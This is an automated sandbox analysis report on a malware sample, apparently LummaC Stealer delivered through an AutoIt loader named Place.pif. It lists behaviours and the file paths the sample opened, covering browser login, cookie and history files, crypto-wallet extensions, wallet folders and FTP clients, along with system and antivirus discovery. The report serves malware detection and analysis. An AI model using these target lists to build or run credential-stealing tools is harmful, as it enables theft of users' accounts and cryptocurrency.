Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.000000000289A000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Place.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005A885B cpuid

11_2_005A885B

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005C0030 GetLocalTime,__swprintf,

11_2_005C0030

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005C0722 GetUserNameW,

11_2_005C0722

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005B416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

11_2_005B416A

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Place.pif PID: 7132, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Place.pif, 0000000B.00000002.2709439962.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Place.pif, 0000000B.00000003.2708119609.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\OnDemandConnRouteHelper.dlljaxx\IndexedDB
Source: Place.pif, 0000000B.00000003.2708300076.000000000431E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Place.pif, 0000000B.00000003.2613112001.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Place.pif, 0000000B.00000003.2708300076.000000000431E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Place.pif	Binary or memory string: WIN_81
Source: Place.pif	Binary or memory string: WIN_XP
Source: Place.pif	Binary or memory string: WIN_XPe
